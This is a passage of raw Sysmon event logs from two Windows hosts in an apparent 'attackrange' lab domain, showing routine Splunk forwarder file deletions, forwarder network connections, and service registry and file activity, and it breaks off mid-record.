23542300x8000000000000000246090Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:33.645{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9625B81B55FE5C6E328CDD742A994DC,SHA256=B9933C795BE1BB46A2DEBFC34094A3400C14DC4E8ED3980CBDB12B23143C810E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061364Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:34.806{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D4BC086258E818F9B9F6EC7961099FF,SHA256=D8510D3BCFF5473B9D60B6493742C9516F4D3A4056D345E5FE60F649CD13538D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246091Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:34.645{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17928782DFB8F934DE2CCFC5EB7DB706,SHA256=C9FE18D734466D21D3AB01338D8C67CA6917EAADC6C0B4D1FF307CF4DD0976D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246092Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:35.660{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0542F47499D0B516DA7C940D0845562,SHA256=1D0F422AF7B683371CBE77FA523E787BF0A959750EDDBCA8C47AA3F3B5996817,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061366Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:32.878{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54824-false10.0.1.12-8000- 23542300x80000000000000001061365Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:36.165{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=330D69F1B41A2DEA0EB6CC169FC7F5B3,SHA256=70D298B31DF7B53D511D27C361F4A1E97A55B9A9D97E960699DCEF12D6D77254,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246096Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:36.691{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77342CD1BB212325AE58DC873056FDEB,SHA256=EB25DBFAF1BAAEAA6C31FA41627CF82C0DF5CEC1F3A24EFB8CC6DF351E372D34,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246095Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:35.499{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64794-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246094Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:36.098{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FDC964426136968E534329416A189342,SHA256=10AE7E0E71924EE7908DF375FF8439DA66A4BD4A3B61F79F5329544C53961B3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246093Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:36.098{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=40839B05310AC24D7830F17CE025D5EC,SHA256=232411C871516D6E943D21DEF982FD0D58E5AA88103DE0824AF8AFF352EB4061,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061368Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:37.525{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=020518AD9FC2584DFD596BEF787E6C2E,SHA256=0FF8002F1419E3F8EC09F4E732313B146B3EF390015EDAE12EFF5E20DEADC52E,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001061367Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:30:37.353{7F8C56E7-4E3C-6063-1000-00000000AF01}100C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72582-0x03fbe371) 23542300x8000000000000000246097Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:37.738{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CAF4AE0C4B1EEDEC80E7677EDE0635D,SHA256=DD6E0BF19B3F5877FC10BAF688430AADE4ED6A04572D56144108C34D0AF25299,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061369Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:38.884{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=061FECCD4D7D338FDA56428385941AC3,SHA256=2AED6732908DA8B0A20E02363C1FBC2EDFC81DFDA2A2773319C06E4E6B6AEE08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246098Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:38.738{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50774058A292AD2FDDDE66FF95BB0B0C,SHA256=0E02EE1F037D35694DC9A5CD1D318901002ACC054B2CB4C1FC8496983620C149,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246099Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:39.770{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D35E30CE58213DABFD6D91E32770015,SHA256=6930C6338FEDC63EA62D8515BA2972F76950BF36CF7867D8E9502B010AD40D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061371Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:40.916{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4373B4509EFA5EC2DF26F8357C19717F,SHA256=C14401B8D07658B1545F16C0EA68E0C23A6CEF0AABD280B53BE3B8F40020571F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061370Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:40.244{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB00FAA11C5D4DE7F8A6CCAA7D3179F6,SHA256=CD805D7C7F91C140E5429538CD6333F994CAD1908CD26C2D4FBB36D499A0A35B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246100Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:40.785{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCF50AF4DEB5179C3A6334DA31667234,SHA256=2588779E53FB36A05532E0902B9DC3FB79F7DEEEA667CB7E966356B4514BC846,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061373Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:41.603{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A4723BED44ADA2D1F3B5796FBBFB44D,SHA256=C540739EFBAD8116013A36B30C8CC2CB8484E6A9496C2E1C1AA4FB057B6B3307,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061372Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:38.066{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54825-false10.0.1.12-8000- 23542300x8000000000000000246104Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:41.801{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EBD24AE123CE36D231DDF77366641EF,SHA256=C97EEF1222B509D0C034F2F1A2E161FE6CF355F74BEB70DC44F25E3423DED5AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246103Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:40.515{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64795-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246102Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:41.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=51FE4EDB284A3FEA7CDF469C9760215B,SHA256=B21C68221103BF1D033BB601AE31083F657E6D68186B688019CC049222415F79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246101Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:41.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FDC964426136968E534329416A189342,SHA256=10AE7E0E71924EE7908DF375FF8439DA66A4BD4A3B61F79F5329544C53961B3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061374Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:42.963{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFE399ACF49BDD19A060B49ED3603E0C,SHA256=22E5B21D57FEA8E407337383217AC439B26C00565F6906A685B7BEE60C8747BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246105Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:42.801{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AE0B134EB1AA5B1ACE92D2C794A1DFD,SHA256=C7B9B28A457CD18B90D172635FDF92B8691DB569D5A0725B4EFFEC64607CE441,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246106Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:43.801{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=470F705966DCE5DCDD3F20C1A318691E,SHA256=3EB88E175533D396258B92F98D1E9F19BC01F78ECB21405DFA7A062DC6E4E3B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061375Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:44.322{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C851F547C2CD05802D0F2006D03580E8,SHA256=BF981BA99F5E7E6F142C82B8CED1AB75F506808FDDA3998D699ED4ED9272BA32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246107Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:44.801{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C1EB6E5BF56293B2F74BB47929C7566,SHA256=180342297FCF1C8BE5EBC90DD061FC1A38E67187EBB08ED61476E2757B823DC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061376Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:45.697{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF624D60C5F6EF4451FE9495CF60F4EF,SHA256=C96A9D14C4388236B7345242768ADB94C8CCF5ECB3CFA7B0DF59AE40176D3FD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246108Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:45.801{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A07CC8444A183C43813826EBDD0A589,SHA256=BF6677102B08173B4145AC0F6455FBC9DCDA1EEECA054A2B1BB18BA790CFB867,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061377Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:43.925{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54826-false10.0.1.12-8000- 23542300x8000000000000000246109Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:46.801{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E731F8419C35DC99083C7391951B7289,SHA256=F4AED9DCBBE6B72898487DD0085A7E56E5F5B801EF13DE3D81D978BC978CE987,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246113Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:46.515{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64796-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246112Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:47.816{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7483315E056127482BC8EECFD53B7398,SHA256=3760C3335F312A75F80DE53BFFD4182EED0C71A1C3090C4E85FED649B7EE1707,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246111Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:47.207{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7BE5A2AF4445B25BDAC546C2A6FFA0EB,SHA256=A9A9E599AA952ED1D0328F5263ED5E286FEC460445D4A0C550B1D9DB07AE43E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246110Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:47.207{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=51FE4EDB284A3FEA7CDF469C9760215B,SHA256=B21C68221103BF1D033BB601AE31083F657E6D68186B688019CC049222415F79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061378Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:48.369{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49985EECDAC902181A5DBBCD7C6A3819,SHA256=63AB6B228249A18BFAA5D1CFD743D409C098C50C7F040AD5E6398E496F19E828,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246114Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:48.816{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=716450513A23B052C83BD9A01B3BB1C1,SHA256=E1EA126E54098ED37EC17AA4450E5C977E48583C5418E2EE63A9216A6CAEC549,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246115Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:49.816{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47E69783D7D9E2008A6C3FDD9DF9FEA3,SHA256=60B8DDC41C7952EA5FC2E0A5D22C174A9EB60057937D8B5BAB75EECC0C39FAFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061380Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:50.245{7F8C56E7-4E3C-6063-1100-00000000AF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=F0B5D643F4B98783208B259ABA4EDEBB,SHA256=6CAE7B7FB731126D783A429EAB28D98D2A730D8673DFC025F76D70A5A736B990,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061379Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:50.057{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBB95678B026965F25B9A6D0B6A89C95,SHA256=CE6D307C7F43DFD8AB9F60E6822114CA98A4F79B575E31241E41EDCCF62536D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246116Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:50.879{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3430FB1E0F26BB2934603033778CD2D,SHA256=00F62DC36DA471B3F760FDDA5599653A029B4FD8F033AA67706CFC611880C847,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061383Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:51.432{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=53BF3EECF2DAD60CE653FDB1C5CFD1F1,SHA256=D86E4CAF641A5BF69F29F0D36643926EFCD4981ED37CAB9D37D3A2953410A4F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061382Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:51.432{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5BAA1F929EB7A257367682277206269,SHA256=6675457232352D9FB41D41CCA60C12F1984F160E55CD78D6785B7F20DDE3EF42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061381Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:51.104{7F8C56E7-4E4C-6063-3300-00000000AF01}2364NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246117Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:51.910{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F08743F34E73D92D476C0FD5E3F1D67,SHA256=494DC03EBFFABF32192AEE5D05C115F1F19BA9264A4FFE28A2F31F8529AF5B9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061384Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:52.792{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8219C0C52443DBA0BBF920E9FCE59DF,SHA256=7CA1E4F6F980E56FE0E555474D61EB4D4185913DB663EB85ED576C49A49BB8D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246122Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:52.941{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62EEF74894296B8CF92A0210C00053F4,SHA256=314618452D60DE16FD92EFA4B480D5A9B17A8424C7A39184999B6A5F9ECA564F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246121Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:52.691{CB4067E1-304B-6062-1200-00000000AF01}1008NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=E67170233ED7CDC89BDD89CB27370970,SHA256=9FE8C3A9CC23B630B843D69DF606A8DAA3E03D4CA353C8724E720A80456EF198,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246120Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 